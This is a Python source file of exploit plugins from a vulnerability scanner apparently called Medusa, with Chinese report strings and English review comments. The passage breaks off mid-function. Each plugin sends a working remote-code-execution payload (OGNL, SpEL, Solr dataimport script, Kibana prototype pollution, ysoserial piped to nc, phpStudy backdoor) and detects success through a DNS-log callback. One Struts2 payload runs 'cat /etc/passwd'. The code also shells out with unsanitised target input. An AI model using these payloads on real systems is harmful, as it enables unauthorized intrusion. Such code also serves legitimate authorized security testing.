def medusa(**kwargs)->None:
    """Struts2 S2-015 check driven by an out-of-band DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs* (each is ``None``
    when the caller omits it). The only success signal is ``DL.result()``,
    i.e. a DNS lookup of ``DL.dns_host()`` observed by the DNS-log service;
    the HTTP response text is merely attached to the report. Failures are
    handed to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # requests-style proxy mapping supplied by the caller
    DL=Dnslog()
    con=""  # response text; stays empty if the request below fails
    payload="""%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())  # DNS-log hostname is the callback target
    try:
        payload_url = url+payload


        try:# guard: on Linux the probe may hang until timeout, which must not abort the DNS-log check
            resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)  # verify=False: TLS certificate errors are ignored
            con = resp.text
        except:
            pass  # bare except also swallows KeyboardInterrupt/SystemExit
        # NOTE(review): if the request raised, `resp` is never bound and the
        # report call below fails with NameError inside the outer handler.

        time.sleep(2)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Spring Data Commons CVE-2018-1273 check via DNS-log callback.

    Normalises *proxies* through ``Proxies().result``, splits *Url* into
    scheme/host/port with ``UrlProcessing().result`` and POSTs the form body
    to ``/users``. A finding is recorded only when ``DL.result()`` reports a
    lookup of ``DL.dns_host()``. *Headers* is modified in place. Errors go to
    ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:

        DL=Dnslog()
        data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()  # DNS-log hostname is the callback target
        payload ="/users?page=&size=5"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        # mutates the caller's Headers dict; anything reusing it sees these values
        Headers["Content-Type"]="application/x-www-form-urlencoded"
        Headers["Referer"]=payload_url

        resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)  # verify=False: certificate errors ignored
        time.sleep(4)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    """Spring Data Commons RCE check (DNS-log variant with a local header set).

    Same probe as the CVE-2018-1273 plugin but builds its own ``headers``
    dict from *RandomAgent* instead of mutating a shared one. A finding is
    recorded only when ``DL.result()`` reports a lookup of ``DL.dns_host()``.
    Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:

        DL=Dnslog()
        data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()  # DNS-log hostname is the callback target
        payload ="/users?page=&size=5"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer":payload_url
        }
        resp = requests.post(payload_url,data=data, headers=headers, proxies=proxies, timeout=6, verify=False)  # verify=False: certificate errors ignored
        time.sleep(4)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            print(Medusa)  # also echoed to stdout, unlike the sibling plugins
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        # NOTE(review): passes (url, plugin name) rather than the
        # ("Plugin Name:...", e) pair the other plugins use; the exception is not logged here.
        _l = ErrorLog().Write(url, _)  # call the writer class with the URL and the failing plugin name
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Struts2 S2-045 check via DNS-log callback.

    Splits *Url* into scheme/host/port/path, rewrites the ``Content-Type``
    entry of the caller's *Headers* dict in place and POSTs to the path.
    The only success signal is ``DL.result()``; the response text is only
    attached to the report. Errors go to ``ErrorHandling``/``ErrorLog``;
    nothing is returned.
    """
    proxies=Proxies().result(proxies)

    scheme, url, port,path = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL=Dnslog()
    con=""  # response text; stays empty if the request below fails
    try:
        payload_url = scheme + "://" + url +":"+ str(port)+path

        # mutates the caller's Headers dict; the DNS-log hostname is the callback target
        Headers["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"


        try:# guard: on Linux the probe may hang until timeout, which must not abort the DNS-log check
            resp = requests.post(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)  # verify=False: certificate errors ignored
            con = resp.text
        except:
            pass  # bare except also swallows KeyboardInterrupt/SystemExit

        time.sleep(2)  # give the DNS-log service time to record the lookup
        if DL.result():
            # NOTE(review): `headers` (lowercase) is not defined in this function — only
            # `Headers` is — so this line raises NameError and the finding is routed to
            # the error handler below instead of being written.
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(**kwargs)->None:
    """Solr CVE-2019-0193 (DataImportHandler) check via DNS-log callback.

    Step 1 lists cores at ``/solr/admin/cores`` and keeps the last core
    name from the ``status`` map; step 2 POSTs the page's dataimport body
    to that core. Only ``DL.result()`` decides the finding. *Headers* is
    modified in place. ``json.loads`` on a non-JSON reply raises and lands
    in the error handler. Nothing is returned.
    """
    url=kwargs.get("Url")# target URL supplied by the caller
    Headers=kwargs.get("Headers")# request headers supplied by the caller
    proxies=kwargs.get("Proxies")# requests-style proxy mapping supplied by the caller
    try:

        payload_url=url+'/solr/admin/cores'
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers).text  # note: TLS verification left at the library default here
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # loop leaves the *last* key of the status map as the core name
            payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = url+ payload
            # mutates the caller's Headers dict; anything reusing it sees these values
            Headers['Accept'] ='application/json'
            Headers["Content-Type"] ="application/x-www-form-urlencoded"
            Headers["X-Requested-With"]="XMLHttpRequest"

            DL = Dnslog()  # initialise DNSlog
            # original author's note: the PoC is fine, the DNSlog side is flaky
           # DL="p61rpm.dnslog.cn"
            data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core="+name+"&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host())  # DNS-log hostname is the callback target
            resp = requests.post(payload_url,data=data2,headers=Headers, proxies=proxies,timeout=6, verify=False)  # verify=False: certificate errors ignored
            # NOTE(review): no sleep before polling, unlike the other DNS-log plugins; a slow callback may be missed
            if DL.result():
                Medusa = "{}存在Solr远程代码执行漏洞(CVE-2019-0193)\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
                WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Log4j RCE check that shells out to ysoserial and netcat.

    Resolves scheme/host/port from *Url*, runs an external ``java -jar``
    pipeline through ``os.system`` and reports a finding only when the
    DNS-log service sees a lookup of ``dns.dns_host()``. *RandomAgent* and
    *proxies* (after ``Proxies().result``) are not used by the probe itself.
    Errors go to ``ClassCongregation.ErrorHandling``/``ErrorLog``; nothing
    is returned.
    """
    proxies = Proxies().result(proxies)

    # NOTE(review): sibling plugins call UrlProcessing().result(Url); here the
    # class is called directly — confirm both forms return the same tuple.
    scheme, url, port = UrlProcessing(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        dns = Dnslog()
        # NOTE(review): the command line is assembled from `url` and `port`, which
        # come straight from the Url argument, and is run through a shell. A target
        # string containing shell metacharacters executes on the scanning host;
        # subprocess.run with an argument list would avoid that. Requires java, the
        # ysoserial jar (path from Ysoserial().result(), presumably) and nc on PATH.
        os.system(
            'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
                Ysoserial().result(), dns.dns_host(), url, port))

        if dns.result():  # the DNS-log callback is the only success signal
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
                url, scheme + "://" + url + ":" + str(port))
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass the url and the scan data to the report writer
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # record the failure against plugin and target
def medusa(**kwargs)->None:
    """Spring Data Commons CVE-2018-1273 check (kwargs-style entry point).

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*, POSTs the form
    body to ``/users`` and records a finding only when ``DL.result()``
    reports a lookup of ``DL.dns_host()``. *Headers* is modified in place.
    Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # requests-style proxy mapping supplied by the caller
    try:

        DL=Dnslog()
        data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()  # DNS-log hostname is the callback target
        payload ="/users?page=&size=5"
        payload_url = url + payload

        # mutates the caller's Headers dict; anything reusing it sees these values
        Headers["Content-Type"]="application/x-www-form-urlencoded"
        Headers["Referer"]=payload_url

        resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)  # verify=False: certificate errors ignored
        time.sleep(4)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(**kwargs)->None:
    """Kibana CVE-2019-7609 (Timelion) check via DNS-log callback.

    POSTs the page's sheet body to ``/api/timelion/run`` and then GETs
    ``/app/canvas``; a finding is recorded only when ``DL.result()`` reports a
    lookup of ``DL.dns_host()``. *Headers* (from *kwargs*) is modified in
    place. Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # requests-style proxy mapping supplied by the caller
    try:
        DL=Dnslog()
        payload_url1 = url + "/api/timelion/run"
        payload_url2 =url + '/app/canvas'
        payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping  %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % DL.dns_host()  # DNS-log hostname is the callback target

        # mutates the caller's Headers dict; anything reusing it sees these values
        Headers['Content-Type']='application/json;charset=utf-8'
        Headers['Referer']=url+'/app/timelion'
        Headers['Accept']='application/json, text/plain, */*'
        Headers['Accept-Language']='zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
        resp = requests.post(payload_url1, headers=Headers,proxies=proxies, data=payload_post, timeout=5, verify=False)  # verify=False: certificate errors ignored
        resp2 = requests.get(payload_url2, headers=Headers,proxies=proxies, timeout=5, verify=False)
        # NOTE(review): no sleep before polling, unlike the other DNS-log plugins; a slow callback may be missed
        if DL.result():
            Medusa = "{} 存在Kibana远程命令执行漏洞(CVE-2019-7609)\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog内容:{}\r\n".format(url,
                                                                                                          payload_url1,
                                                                                                          DL.dns_host(),)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp2,**kwargs).Write()  # pass the url and the scan data (second response) to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Kibana Timelion RCE check (variant building its own headers).

    Resolves scheme/host/port from *Url*, POSTs the sheet body to
    ``/api/timelion/run`` and GETs ``/app/canvas`` with a local ``headers``
    dict based on *RandomAgent*. Only ``DL.result()`` decides the finding.
    Errors go to ``ErrorHandling``/``ErrorLog``; nothing is returned.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        DL=Dnslog()
        payload_url1 = scheme + '://' + url + ':' + str(port) + "/api/timelion/run"
        payload_url2 = scheme + '://' + url + ':' + str(port) + '/app/canvas'
        payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping  %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % DL.dns_host()  # DNS-log hostname is the callback target
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json;charset=utf-8',
            'Referer': scheme+'://'+url+':'+str(port)+'/app/timelion',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        }
        resp = requests.post(payload_url1, headers=headers,proxies=proxies, data=payload_post, timeout=5, verify=False)  # verify=False: certificate errors ignored
        resp2 = requests.get(payload_url2, headers=headers,proxies=proxies, timeout=5, verify=False)
        # NOTE(review): no sleep before polling; a slow callback may be missed
        if DL.result():
            Medusa = "{}存在Kibana远程命令执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog内容:{}\r\n".format(url,
                                                                                                          payload_url1,
                                                                                                          DL.dns_host(),)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Struts2 S2-005 check with two payloads and two success signals.

    Resolves scheme/host/port/path from *Url* and GETs each of the two query
    strings below. A finding is recorded when either the response echoes the
    ``/etc/passwd`` markers tested on the ``if`` line (HTTP 200) or the
    DNS-log service reports a lookup of ``DL.dns_host()``. Each payload has
    its own error handler, so a failure on the first does not skip the
    second. Nothing is returned.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port ,path= UrlProcessing().result(Url)# this family of checks needs the request path as well
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL=Dnslog()
    linux_payload ="?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27cat+/etc/passwd%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))"  # in-band variant: success is read from the response body
    windows_payload="?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27ping+{}%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))".format(DL.dns_host())  # out-of-band variant: DNS-log hostname is the callback target

    for payload in [linux_payload,windows_payload]:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + path + payload

            resp=requests.get(payload_url,headers=Headers, proxies=proxies,timeout=5, verify=False)  # verify=False: certificate errors ignored
            code=resp.status_code
            con=resp.text
            # either the body shows the passwd markers, or the DNS-log saw the lookup
            # (no sleep before DL.result(), so a slow callback may be missed)
            if (code == 200 and con.find('root:')!=-1 and con.find('/bin/bash')!=-1 and con.find('bin:')!=-1) or DL.result():
                Medusa = "{} 存在Struts2远程代码执行漏洞(S2-005)\r\n漏洞详情:\r\n影响版本:2.0.0-2.1.8.1\r\nPayload:{}\r\n返回执行内容:{}\r\n".format(url, payload_url,con)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write()  # pass the url and the scan data to the report writer
                WriteFile().result(str(url), str(Medusa))  # write to file: url is the target file name, Medusa the result text
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,e)  # record the failure against plugin and target
def medusa(Url, RandomAgent, ProxyIp):
    """Log4j RCE check (older signature) shelling out to ysoserial and netcat.

    Resolves scheme/host/port from *Url*, runs an external ``java -jar``
    pipeline through ``os.system`` and reports a finding only when the
    DNS-log service sees a lookup of ``dns.dns_host()``. *RandomAgent* and
    *ProxyIp* are accepted but not used. Errors are logged through
    ``ClassCongregation.ErrorLog`` without the exception object; nothing is
    returned.
    """

    # NOTE(review): sibling plugins call UrlProcessing().result(Url); here the
    # class is called directly — confirm both forms return the same tuple.
    scheme, url, port = UrlProcessing(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        dns = Dnslog()
        # NOTE(review): the command line is assembled from `url` and `port`, which
        # come straight from the Url argument, and is run through a shell. A target
        # string containing shell metacharacters executes on the scanning host;
        # subprocess.run with an argument list would avoid that. Requires java, the
        # ysoserial jar and nc on PATH.
        os.system(
            'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
                Ysoserial().result(), dns.dns_host(), url, port))

        if dns.result():  # the DNS-log callback is the only success signal
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
                url, scheme + "://" + url + ":" + str(port))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target file name, Medusa the result text
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        _l = ClassCongregation.ErrorLog().Write(url, _)  # call the writer class with the URL and the failing plugin name (the exception itself is dropped)
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Struts2 S2-008 check via DNS-log callback.

    Resolves scheme/host/port/path from *Url*, appends the page's query
    string and GETs it. Unlike the S2-015/S2-016 plugins the request is not
    wrapped in its own try, so a timeout goes straight to the error handler
    and the DNS-log is never polled. Only ``DL.result()`` decides the
    finding. Nothing is returned.
    """
    proxies=Proxies().result(proxies)

    scheme, url, port,path = UrlProcessing().result(Url)
    # derive the port from the scheme when the URL did not carry one
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL=Dnslog()
    payload="""?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format(DL.dns_host())  # DNS-log hostname is the callback target
    try:
        payload_url = scheme + "://" + url +":"+ str(port)+path+payload


        resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)  # verify=False: certificate errors ignored
        con = resp.text
        time.sleep(3)  # give the DNS-log service time to record the lookup
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data to the report writer
            WriteFile().result(str(url),str(Medusa))# write to file: url is the target file name, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin group name used in the error record
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# record the failure against plugin and target
def medusa(**kwargs)->None:
    """phpStudy backdoor check via DNS-log callback.

    GETs ``/index.php`` with the base64-encoded command placed in the
    ``accept-charset`` header (note ``cmd`` is ``bytes``, which ``requests``
    accepts as a header value). A finding is recorded only when
    ``DL.result()`` reports a lookup of ``DL.dns_host()``. *Headers* (from
    *kwargs*) is modified in place. Errors go to ``ErrorHandling``/``ErrorLog``;
    nothing is returned.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # requests-style proxy mapping supplied by the caller

    DL=Dnslog()
    payload = "/index.php"
    commandS = ('''system("ping {}");''').format(DL.dns_host())  # DNS-log hostname is the callback target
    cmd = base64.b64encode(commandS.encode('utf-8'))  # bytes, not str
    try:
        payload_url = url+payload

        # mutates the caller's Headers dict; anything reusing it sees these values
